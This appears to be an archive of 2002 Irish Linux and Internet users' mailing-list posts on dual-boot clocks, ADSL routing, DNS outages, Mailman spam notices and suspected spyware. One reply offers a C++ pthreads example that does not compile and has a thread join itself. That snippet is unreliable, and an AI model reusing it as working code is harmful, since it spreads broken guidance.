&gt;&gt; as there was no mention of it in any of the docs I read. &gt;&gt; I still dual-boot on a regular basis and if Windows is sneakily messing
&gt;&gt; with the clock, I'd be interested to know in what way it is and how it
&gt;&gt; couild be stopped from doing so.
&gt; In my experience Windows will change the hardware clock the first time
&gt; you boot into it after the clocks have gone forward/back an hour.  This
&gt; will only happen twice a year. How to stop it, I have not checked (I
&gt; just switch the clock back an hour from within windows after such a
&gt; reboot).  Is there a GMT windows timezone?Start-&gt;Settings-&gt;Control Panel-&gt;Date/Time-&gt;Time Zone tab-&gt; Uncheck
"Automatically adjust clock for daylight saving change".Ciaran-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>I'm configuring this at the moment. -&gt; Still ;--)I found out that my firewall box has a dodgy USB and so I'm awaiting a
PCI-USB controller to finish the configuration. I meant to buy one yesterday
and forgot. I've bought Smoothwall Corporate edition as its the best
firewall/routing solution around or so I've been led to believe. Will be doing NAT/Proxy/firewall, maybe VPN too but we shall see. CW-----------
Hi all,
	I am seriously thinking of getting the ADSL "solo" connection
from Eircom. I also have more than one computer therefore I need a router
so that I can connect them together.
The 2 options I am looking at are : 
  the ADSL usb modem connected to my linux machine, with the linux
	machine acting as firewall; and
  a combined router / firewall box which would be connected directly
	to the ADSL modem.So my questions are : 
	what recommendations would any of you have about the above ?
	do I need to have NAT (I have only a vague idea of what this does )?
	what other options should I be looking at ?Thanks
Con
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>is it really necessary to send these to the list?
----- Original Message -----
From: 
To: 
Sent: Tuesday, August 20, 2002 8:54 AM
Subject: [ILUG] Mail sent to ILUG
&gt; Your mail to 'ILUG' with the subject:
&gt;
&gt;     Audio plays a critical part in the Web surfer's consciousness rvxa
&gt;
&gt; Is being held until the list moderator can review it for approval.
&gt;
&gt; The reason it is being held:
&gt;
&gt;     Suspicious header
&gt;
&gt; Either the message will get posted to the list, or you will receive
&gt; notification of the moderator's decision.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</si>
  <si>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Yo Mark,Have you goten the closed source drivers from Nvidia or are you still using
the wans that came with Redbum? http://www.nvidia.com and then somewhere...somwhere-else...Installation is WELL detailed, you should see the NV splash screen, don;t
forget to edit the config files.CW
--------------------------------------
HiI have just installed Red Hat 7.2 on my desktop machine. I am completely new
to Linux and therefore have run into a few problems.The graphic display on my PC doesnt seem to work. My monitor is slightly
miss-aligned and I cannot run any high resolution games ( everything freezes
). In the hardware browser in Gnome it lists my Graphics Card (Riva TNT2),
and shows installed drivers...... maybe the problem lies elswhere.Another problem I have is that I cannot install my ISDN, USB modem ( LASAT
Speed Basic ), however im pretty sure its not supported by Linux, but again
it is featured in the Hardware Browser, without installed drivers.If anybody has any ideas, please let me know cos id like to use Linux more.
Please keep in mind I am new to it though.ThanksMark
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Yes, the lasat speed basic sucks-ass.com, it won't work coz its from eircon
who are shite. I have two of em sitting in my drawer of "might have a use some day or
other"...Get yourself an el-cheapo ISDN card, 50 yoyo's will usually suffice. I have
a TRUST load a crap HFC based one which has been trodding along nicely for
yonks. Gets detected automagically by pretty much ANY distro, has kernel
support for a million years or so. Later,
CWp.s.: you other modems are probably winmodems and are a pain in ze arse.com,
they will work with lots of poking but not worth the effort IMHO. Just use
ISDN and NAT it.
-----------------
Regarding:
Another problem I have is that I cannot install my ISDN, USB modem ( LASAT
Speed Basic ), however im pretty sure its not supported by Linux, but again
it is featured in the Hardware Browser, without installed drivers.Thanks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).It could well be my inexperience with Linux that is making this more
difficult, but whatever it is iv just about had enough!! Any last gasp ideas
would be welcomeMany ThanksMark-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>No problems installing OpenOffice 653??? and 1.0. Had some issues with bz2's
being corrupted but fixed when downloaded again. I am downloading the src of 1.01 at the mo to se if it will work any faster
compiled for my architecture. Regards,
CW------------
Hi All,Just wondering if anyone has ever installed StarOffice
6.0 (or Open Office), and if any have experienced any
problems with the install freezing ?I'm using RedHat 7.3 kernel 2.4.18-3, and glibc 2.2.5
?I might try downloading OpenOffice instead if it is
unresolved!!!!Cheers all,Colin
__________________________________________________
Do You Yahoo!?
Everything you'll ever need on one web page
from News and Sport to Email and Music Charts
http://uk.my.yahoo.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Vincent Cunniffe wrote:
&gt; 
&gt; Possibly. However, the amount of memory in use is stupid :
&gt; 
&gt; I start 50 threads, and the memory usage goes up to 411436 VSZ/840 RSS.
&gt; 
&gt; Then I stop those threads, and the usage stays there. I start another 50
&gt; threads, and the usage goes up to 821036 VSZ/1040 RSS. So, it's neither
&gt; freeing the resources correctly nor reusing them :-/
&gt; 
&gt; I've found several other people seeing the same VSZ issue with pthreads,
&gt; spread over a long time, but no solution as yet.Err, Is your code fixed now?
You need a seperate pthread_t per thread.PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Padraig Brady wrote:
&gt; Vincent Cunniffe wrote:
&gt; 
&gt;&gt;
&gt;&gt; Possibly. However, the amount of memory in use is stupid :
&gt;&gt;
&gt;&gt; I start 50 threads, and the memory usage goes up to 411436 VSZ/840 RSS.
&gt;&gt;
&gt;&gt; Then I stop those threads, and the usage stays there. I start another 50
&gt;&gt; threads, and the usage goes up to 821036 VSZ/1040 RSS. So, it's neither
&gt;&gt; freeing the resources correctly nor reusing them :-/
&gt;&gt;
&gt;&gt; I've found several other people seeing the same VSZ issue with pthreads,
&gt;&gt; spread over a long time, but no solution as yet.
&gt; 
&gt; 
&gt; Err, Is your code fixed now?
&gt; You need a seperate pthread_t per thread.I've tested it with and without separate pthread_t's, and the problem is
identical, unfortunately.Regards,Vin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>&gt; -----Original Message-----
&gt; From: Vincent Cunniffe [mailto:vincent@cunniffe.net]
&gt; Sent: 20 August 2002 10:43
&gt; To: ilug
&gt; Subject: Re: [ILUG] linux pthreads problem
&gt; 
&gt; Padraig Brady wrote:
&gt; &gt; Vincent Cunniffe wrote:
&gt; &gt;
&gt; &gt;&gt;
&gt; &gt;&gt; Possibly. However, the amount of memory in use is stupid :
&gt; &gt;&gt;
&gt; &gt;&gt; I start 50 threads, and the memory usage goes up to 411436 VSZ/840 RSS.
&gt; &gt;&gt;
&gt; &gt;&gt; Then I stop those threads, and the usage stays there. I start another
&gt; 50
&gt; &gt;&gt; threads, and the usage goes up to 821036 VSZ/1040 RSS. So, it's neither
&gt; &gt;&gt; freeing the resources correctly nor reusing them :-/
&gt; &gt;&gt;
&gt; &gt;&gt; I've found several other people seeing the same VSZ issue with
&gt; pthreads,
&gt; &gt;&gt; spread over a long time, but no solution as yet.
&gt; &gt;
&gt; &gt;
&gt; &gt; Err, Is your code fixed now?
&gt; &gt; You need a seperate pthread_t per thread.
&gt; 
&gt; I've tested it with and without separate pthread_t's, and the problem is
&gt; identical, unfortunately.
&gt; 
&gt; Regards,
&gt; 
&gt; Vin
&gt; 
&gt; 
&gt; --
&gt; Irish Linux Users' Group: ilug@linux.ie
&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
&gt; information.
&gt; List maintainer: listmaster@linux.ieAre you using pthread_join(somethread,0);
When you are closing off your instanciated thread made from
pthread_t*somethread ?-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>&gt; Are you using pthread_join(somethread,0);
&gt; When you are closing off your instanciated thread made from
&gt; pthread_t*somethread ?Something like this might help you out.... Class la{
 Public:
	pthread_t*thread;
	void thread_me(int num)
	};la*lala;
typedef struct list
{
 la*w;
 struct list*next;
}list_struct;list_struct*head;void thread_me(int num);
void add_to_list(la*o);
void delete_from_list();int main(int argc,char**argv)
{
int a=1; lala=new la;
 thread= new pthread_t;
 add_to_list(lala);
 pthread_create(thread,0,&amp;lala.thread_me,&amp;a); thread= new pthread_t;
 add_to_list(lala);
 pthread_create(thread,0,&amp;lala.thread_me,&amp;a);delete_from_linked_list();
return 0;
};void lala::thread_me(int num)
{
 printf("lalala");
 pthread_join((*this)-&gt;thread,0);
return;
};void add_to_list(la*o)
{
 static list_struct*a;
 a=new list_struct;
 a-&gt;w=o;
 a-&gt;next=head;
 head=a;
return;
};void delete_from_linked_list()
{
 list_struct*a; while(head!=NULL)
	{
	 a=head;
	 head=head-&gt;next;
 	 delete a;
	};
 return;
};-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>hrishy's [hrishys@yahoo.co.uk] 22 lines of wisdom included:
&gt; Hi All
&gt; 
&gt; 
&gt; I ahd some users test1 test2 etc.i deleted their
&gt; mailboxes from /var/mail/test1 etc.now the postfix
&gt; queue seems to be huge can anybody help what could be
&gt; wrongSome logs might be of some help.1) some output of /var/log/maillog with some relevant error message
(that could be /var/log/mail.log or some other log depending on your
configuration)2) the output from ``postconf -n''On another note, you did recreate the mailboxes, didn't you?-- 
  Philip Reynolds        
   RFC Networks          tel: 01 8832063
www.rfc-networks.ie      fax: 01 8832041-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>John P. Looney's [valen@tuatha.org] 11 lines of wisdom included:
&gt;  OK, Mutt uses sendmail to deliver mail...
&gt; 
&gt;  How can I get it to deliver via a Postfix box with SMTP auth enabled ?Mutt interacts with smtpdaemon or something like that doesn't it?Can mutt interact directly with SMTP server with authentication
capabilities? I don't think it can. Surely you can just run a mailserver on your own machine and send
mail using it? -- 
  Philip Reynolds        
   RFC Networks          tel: 01 8832063
www.rfc-networks.ie      fax: 01 8832041-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Tue, Aug 20, 2002 at 12:06:18PM +0100, Philip Reynolds mentioned:
&gt; John P. Looney's [valen@tuatha.org] 11 lines of wisdom included:
&gt; &gt;  OK, Mutt uses sendmail to deliver mail...
&gt; &gt; 
&gt; &gt;  How can I get it to deliver via a Postfix box with SMTP auth enabled ?
&gt; 
&gt; Mutt interacts with smtpdaemon or something like that doesn't it?
&gt; 
&gt; Can mutt interact directly with SMTP server with authentication
&gt; capabilities? I don't think it can. 
&gt; 
&gt; Surely you can just run a mailserver on your own machine and send
&gt; mail using it?  Hmm. Yeah, mutt sorta calls the sendmail program directly. But I thought
it would be very crap if the auth details (username, password) had to be
hardcoded into the sendmail.cf (and damned if I can work out how to do
that anyway).Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Well boyz, whats the story? Its tuesday an all. I've to work late today so
what time are we talking about? CW-------------------
On Wed, Aug 14, 2002 at 09:22:27AM +0100, Wynne, Conor mentioned:
&gt; When are we going to have a pint?  Tuesday next week. Boars Head, Capel st.Kate-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Tue, Aug 20, 2002 at 12:21:12PM +0100, Wynne, Conor mentioned:
&gt; Well boyz, whats the story? Its tuesday an all. I've to work late today so
&gt; what time are we talking about?  I've to leave the girlfriend home first. So, I'll be there sometime just
after seven.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Sound. I'll be there at 7ish so. CW-----------
 I've to leave the girlfriend home first. So, I'll be there sometime just
after seven.Kate-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Thanks lads,I didn't mean to criticise/give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intelligently!CiaranWaider elucidated:&gt; Martin Feeney wrote:
&gt; | On Tue, 20 Aug 2002 10:14:59 Ciaran Mac Lochlainn wrote:
&gt; |
&gt; |&gt; is it really necessary to send these to the list?
&gt; |
&gt; |
&gt; | What's happening is that the scumbag spammers are forging the from
&gt; | address to be ilug@linux.ie as well, so the notification to them that
&gt; | their email is being reviewed gets sent back to the from address:
&gt; | ilug@linux.ie
&gt; |
&gt; | Martin.
&gt; |
&gt;
&gt; Not to belabour the point, but noone can legitimately send mail to ilug
&gt; from ilug@linux.ie, so Mailman should be catching this and stopping it.
&gt; Not sending confirms or whatever, just dropping the mail on the floor.
&gt;
&gt; Cheers,
&gt; Waider.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Tue, Aug 20, 2002 at 03:07:35PM +0100, Anthony wrote:
&gt; &gt; &gt; In my experience Windows will change the hardware clock the first time
&gt; &gt; &gt; you boot into it after the clocks have gone forward/back an hour.  This
&gt; &gt; &gt; will only happen twice a year. How to stop it, I have not checked (I
&gt; &gt; &gt; just switch the clock back an hour from within windows after such a
&gt; &gt; &gt; reboot).  Is there a GMT windows timezone?
&gt; &gt; _x0018_
&gt; 
&gt; &gt; Start-&gt;Settings-&gt;Control Panel-&gt;Date/Time-&gt;Time Zone tab-&gt; Uncheck
&gt; &gt; "Automatically adjust clock for daylight saving change".
&gt; &gt; 
&gt; 
&gt; Ah, that's grand. I knew about that aspect and had already unchecked the
&gt; appropriate box. I was just worried that Windows was engaging in
&gt; undocumented behaviour that I didn't know about.
&gt; 
well, it changes the time then, and then leaves it alone.However, Windows expects the time in the RTC to be local time. Linux
can be configured to do either this, or to have the RTC at UTC,
and then use /etc/localtime to figure out the right timezone.Depending on how you've set it up, this may be a problem (with one
or other of the OS's one hour out). OS-X also does this silliness :((RTC should always have UTC, that way different people can set their
own timezone on the machine... though I suppose that only applies
to multi-user machines).L.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hi all,Sorry for the OT. Just wondering if anybody knows of a similar type mailing
list specifically dealing with MacOSX?  (which, FYI is a version of BSD)
SlÃ¡n,Tim-- 
One month on the internet in Ireland: Eur720
One month on the internet in Britain: Eur 25
Visit http://www.irelandoffline.org
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Could you please help me how to set up a dial-on-demand, what are the
packages needed,
and other requirements to get on.
Do you know a site that has a how to and the package where to get it.
Please help me please for this was my assignment.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>I missed this previously, but
the Gobe productive office suite
(available for Linux and Windows)
is going GPL.http://www.theregister.co.uk/content/4/26642.htmlPÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hi folks,
Apologies if this is the wrong place to ask, but I am trying to do on my linux desktop what I used to do with some other os software.I'm trying to use a combination of some bash scripts and some perl to generate reports from a couple of ascii files. Eventually these will run on a server and get the files by ftp, analyse them and mail me the results.As I'm no programmer (by any stretch of the imagination !) I'm getting a bit lost.I can deal with single files (eventually) using grep, egrep, awk, and a nice perl script called 'total' which i found while googling.Problem now is that the data I'm trying to report on is split between two isam files.File 1 contains
Docket Number, Line Number, Item, quantity, price, duedateFile 2 contains
Docket Number, Customer, Shipping date, invoice number.To make some sense of the data, I need to relate the Docket number between the 2 files, so that I can generate a report by customer.My first reaction is to look at mysql, and import the ascii data into 2 tables so that I can use sql queries.Is this the way to go, or should I delve a bit deeper into perl ?Any advice welcome.Thanks,
Declan
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Declan Grady wrote:
&gt; Hi folks,
&gt; Apologies if this is the wrong place to ask, but I am trying to do on my linux desktop what I used to do with some other os software.
&gt; 
&gt; I'm trying to use a combination of some bash scripts and some perl to generate reports from a couple of ascii files. Eventually these will run on a server and get the files by ftp, analyse them and mail me the results.
&gt; 
&gt; As I'm no programmer (by any stretch of the imagination !) I'm getting a bit lost.
&gt; 
&gt; I can deal with single files (eventually) using grep, egrep, awk, and a nice perl script called 'total' which i found while googling.
&gt; 
&gt; Problem now is that the data I'm trying to report on is split between two isam files.
&gt; 
&gt; File 1 contains
&gt; Docket Number, Line Number, Item, quantity, price, duedate
&gt; 
&gt; File 2 contains
&gt; Docket Number, Customer, Shipping date, invoice number.
&gt; 
&gt; To make some sense of the data, I need to relate the Docket number between the 2 files, so that I can generate a report by customer.
&gt; 
&gt; My first reaction is to look at mysql, and import the ascii data into 2 tables so that I can use sql queries.
&gt; 
&gt; Is this the way to go, or should I delve a bit deeper into perl ?
&gt; 
&gt; Any advice welcome.man join
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>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appreaciated...Kiall Mac Innes
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On (21/08/02 12:42), Kiall Mac Innes didst pronounce:
&gt;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Try a hammer -- great precision tool that!!-- 
Chat ya later,John.
--
BOFH excuse #167: excessive collisions &amp; not enough packet ambulances-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Spray a bit of wd40 around the screw, and leave for a few minutesTry using a small crocodile-nosed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again.Another method is to get a small screwdriver that you can consider
disposable, and gently tap it into the head of the stripped screw, until
you either have a flat head screw, or you can get enough turning force
 on it.Cathal.On Wed, 21 Aug 2002, Kiall Mac Innes wrote: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&gt; Kiall Mac Innes
&gt;
&gt;
&gt;-- 
Cathal Ferris.			pio@skynet.ie
+353 87 9852077			www.csn.ul.ie/~pio
---
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,Four of the IE nameservers are publishing out of date DNS information.
The four listed below are publishing the IE zone from last Friday.
They are six days behind reality. 192.16.202.11    NS.EU.NET.
 192.93.0.4       NS2.NIC.FR.
 198.133.199.102  GNS1.DOMAINREGISTRY.IE.
 198.133.199.103  GNS2.DOMAINREGISTRY.IE.The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odds.Don't forget, if you lose the gamble your resolver is going to cache
the bad data for up to two days.If you're a user of BIND 8 or BIND 9 you could add	blackhole {
		192.16.202.11;
		192.93.0.4;
		198.133.199.102;
		198.133.199.103;
	};to your named.conf and restart BIND to avoid query the bad nameservers.
This will prevent _any_ queries to those servers.Putting	16.1.0.18
	204.123.2.18
	16.1.0.19
	192.111.39.100
	212.17.32.2
	193.1.142.2in /service/dnscache/root/servers/ie and restarting dnscache will
have the same result for dnscache users.
ATB,
james
_______________________________________________
Irish Internet Users mailing list
Irish Internet Users@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">As list administrator, your authorization is requested for the
following mailing list posting:    List:    Irish Internet Users@iiu.taint.org
    From:    yyyycc@hackwatch.com
    Subject: Re: [IIU] IE nameserver problems
    Reason:  Post to moderated listAt your convenience, visit:    http://iiu.taint.org/mailman/admindb/iiu
to approve or deny the request.
</t>
  </si>
  <si>
    <t xml:space="preserve">James Raftery wrote:
&gt; 
&gt; Hi,
&gt; 
&gt; Four of the IE nameservers are publishing out of date DNS information.
&gt; The four listed below are publishing the IE zone from last Friday.
&gt; They are six days behind reality.James,
Last week, when indexing stuff for WhoisIreland.com, I noticed that
ns0.domainregistry.ie and banba.domainregistry.ie were out of synch by a
few days. The other nameservers seemed to give a current SOA at that
time. However the affected secondaries may have been using
ns0.domainregistry.ie for axfr and propagated the error.This whole thing does seriously bring into question IEDR's decision to
outsource the technical admininstration of .ie to a company that
apparently does not even admin its own DNS.  It is a nice story though -
almost as good as the time that .ie disappeared for 8 hours in July
1998.Regards...jmcc
-- 
********************************************
John McCormac            * Hack Watch News
jmcc@hackwatch.com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Irish Internet Users mailing list
Irish Internet Users@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all --We had a pretty serious crash on the list host over the weekend, and it
destroyed all configuration data.  As a result, I've had to rebuild the
mailing list from various other sources -- including the archives of
past list traffic.If you're a list subscriber, you may have received a "welcome to the list"
mail. All well and good.  However, if you *used* to be subscribed to one 
of the lists at some point in 2002, or never were (I'm hoping that didn't
happen!), you may have also have received one of these.  Just go to the
URL and click "unsubscribe", providing the password from the mail if
necessary.If you're a list admin on any of the lists at lists.boxhost.net or
taint.org, I'd appreciate if you could take a look and make sure the
settings match up with what they used to be.Sorry about this :(--j.-- 
'Justin Mason' =&gt; { url =&gt; 'http://jmason.org/', blog =&gt; 'http://taint.org/' }_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,John McCormac  wrote:
&gt; Last week, when indexing stuff for WhoisIreland.com, I noticed that
&gt; ns0.domainregistry.ie and banba.domainregistry.ie were out of synch by
&gt; a few days. The other nameservers seemed to give a current SOA at that
&gt; time. However the affected secondaries may have been using
&gt; ns0.domainregistry.ie for axfr and propagated the error.I don't know what role ns0 plays in relation to the IE zone. It's
certainly not involved in the regular resolution process. It may
be involved in zone distribution as you suggest. IIRC (and I often
don't) on Friday ns0 had a serial that none of the IE nameservers 
shared. Unfortunately I don't have a record of that.&gt; This whole thing does seriously bring into question IEDR's decision to
&gt; outsource the technical admininstration of .ie to a company that
&gt; apparently does not even admin its own DNS. It is a nice story though -
&gt; almost as good as the time that .ie disappeared for 8 hours in July
&gt; 1998.... and only you noticed :)
[ Messages on the IEDR-FORUM list at the time don't support 
  your assertion ]As an aside, shortly after my note on Friday uucp-gw-1.pa.dec.com and
uucp-gw-2.pa.dec.com stopped responding to DNS requests. So IE had
two dead nameservers, four stuck a week in the past and three
working correctly. Marvellous.
ATB,
james
_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">James Raftery wrote:
&gt; 
&gt; I don't know what role ns0 plays in relation to the IE zone. It's
&gt; certainly not involved in the regular resolution process. It may
&gt; be involved in zone distribution as you suggest. IIRC (and I often
&gt; don't) on Friday ns0 had a serial that none of the IE nameservers
&gt; shared. Unfortunately I don't have a record of that.&gt;&gt;From indexing CNO, ns0 appears to be IEDR's CNO nameserver for its CNO
domains (iedr.com and others).
&gt; &gt; This whole thing does seriously bring into question IEDR's decision to
&gt; &gt; outsource the technical admininstration of .ie to a company that
&gt; &gt; apparently does not even admin its own DNS. It is a nice story though -
&gt; &gt; almost as good as the time that .ie disappeared for 8 hours in July
&gt; &gt; 1998.
&gt; 
&gt; ... and only you noticed :)
&gt; [ Messages on the IEDR-FORUM list at the time don't support
&gt;   your assertion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 that makes some sense.
History now but it has an alarming relevance. :)
&gt; As an aside, shortly after my note on Friday uucp-gw-1.pa.dec.com and
&gt; uucp-gw-2.pa.dec.com stopped responding to DNS requests. So IE had
&gt; two dead nameservers, four stuck a week in the past and three
&gt; working correctly. Marvellous.Confirm that. The nameservers themselves had connectivity problems from
what I could see and it was going on for a while, even *after* the
initial SOA problems. I am thinking of writing a simple .ie secondary state monitor for
inclusion on WhoisIreland.com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1 week loss
of synch should not happen with a national domain. Ireland as E-hub -
more like e-jit central! :)Regards...jmcc
-- 
********************************************
John McCormac            * Hack Watch News
jmcc@hackwatch.com       * 22 Viewmount, 
Voice:   +353-51-873640  * Waterford,
BBS&amp;Fax: +353-51-850143  * Ireland
http://www.hackwatch.com/~kooltek
********************************************-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6mQCNAzAYPNsAAAEEAPGTHaNyitUTNAwF8BU6mF5PcbLQXdeuHf3xT6UOL+/Od+z+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IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">As list administrator, your authorization is requested for the
following mailing list posting:    List:    IIU@iiu.taint.org
    From:    emailharvest@email.com
    Subject: Harvest lots of E-mail addresses quickly !
    Reason:  Post by non-member to a members-only listAt your convenience, visit:    http://iiu.taint.org/mailman/admindb/iiu
to approve or deny the request.
</t>
  </si>
  <si>
    <t xml:space="preserve">As list administrator, your authorization is requested for the
following mailing list posting:    List:    IIU@iiu.taint.org
    From:    friendsworld@lovefinder.com
    Subject: humour Friendship to share !
    Reason:  Post by non-member to a members-only listAt your convenience, visit:    http://iiu.taint.org/mailman/admindb/iiu
to approve or deny the request.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Does that mean that you could reach further, but you couldn't take up as 
much bandwidth then?a.At 04:27 PM 7/26/2002 +0100, Bernie Goldbach wrote:
&gt;Hi,
&gt;
&gt;I believe the higher allowance nationally comes with a prescribed specific 
&gt;frequency constraint, so if you want 2 watts, you will have to confine 
&gt;yourself to a tighter limit of the open spectrum. That could affect 
&gt;deployments that channel-hop when they encounter degradations in signal 
&gt;strength.
&gt;
&gt;regards
&gt;Bernie Goldbach
&gt;::talking to signs::
&gt;
&gt;
&gt;_______________________________________________
&gt;IIU mailing list
&gt;IIU@iiu.taint.org
&gt;http://iiu.taint.org/mailman/listinfo/iiu--Antoin O Lachtnain
**  antoin@eire.com ** http://www.eire.com ** +353-87-240-6691_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">As list administrator, your authorization is requested for the
following mailing list posting:    List:    IIU@iiu.taint.org
    From:    emailharvest@email.com
    Subject: ADV: Harvest lots of E-mail addresses quickly !
    Reason:  Post by non-member to a members-only listAt your convenience, visit:    http://iiu.taint.org/mailman/admindb/iiu
to approve or deny the request.
</t>
  </si>
  <si>
    <t xml:space="preserve">The IIU@iiu.taint.org mailing list has 1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t>
  </si>
  <si>
    <t xml:space="preserve">Hello all
I'm looking for advice. My pc has developed a disturbing tendency of trying
to access IP 62.17.143.253 without my consent. It has got to the stage where
normal web-browsing is almost impossible.
I have checked IP address on RIPE database and I know precisely who is being
called. I contacted that company on 14 July, when the problem first arose
and asked for a remedy but (surprise) got no reply.
A helpful person on the ie.comp list suggested Adaware spyware removal. I
ran this and haven't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IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Do you know which app is making the connection?
At 20:18 03/08/02 +0100, you wrote:
&gt;Hello all
&gt;I'm looking for advice. My pc has developed a disturbing tendency of trying
&gt;to access IP 62.17.143.253 without my consent. It has got to the stage where
&gt;normal web-browsing is almost impossible.
&gt;I have checked IP address on RIPE database and I know precisely who is being
&gt;called. I contacted that company on 14 July, when the problem first arose
&gt;and asked for a remedy but (surprise) got no reply.
&gt;A helpful person on the ie.comp list suggested Adaware spyware removal. I
&gt;ran this and haven't had a problem again until today.
&gt;The offending program is obviously not in Adaware db. (I run adaware with
&gt;current ref files every day now).?
&gt;Any suggestions, please,  for removing whatever the f*** is causing this
&gt;from my pc?
&gt;Brian
&gt;
&gt;
&gt;_______________________________________________
&gt;IIU mailing list
&gt;IIU@iiu.taint.org
&gt;http://iiu.taint.org/mailman/listinfo/iiu========================================================================
Martin Whelan | DÃ©ise Design | www.deisedesign.com | Tel : 086-8888975" Our core product DÃ©iseditor Â©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"DÃ©iseditor Â© " Managing Your Information "
========================================================================_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Unfortunately, I don't. ZoneAlarm normally gives that info but not this
time. It just blocks the outward access and warns me that the attempt
occurred.
Brian
----- Original Message -----
From: "Martin Whelan" 
To: 
Sent: Saturday, August 03, 2002 9:32 PM
Subject: Re: [IIU] spyware calling home?
&gt; Do you know which app is making the connection?
&gt;
&gt;
&gt; At 20:18 03/08/02 +0100, you wrote:
&gt; &gt;Hello all
&gt; &gt;I'm looking for advice. My pc has developed a disturbing tendency of
trying
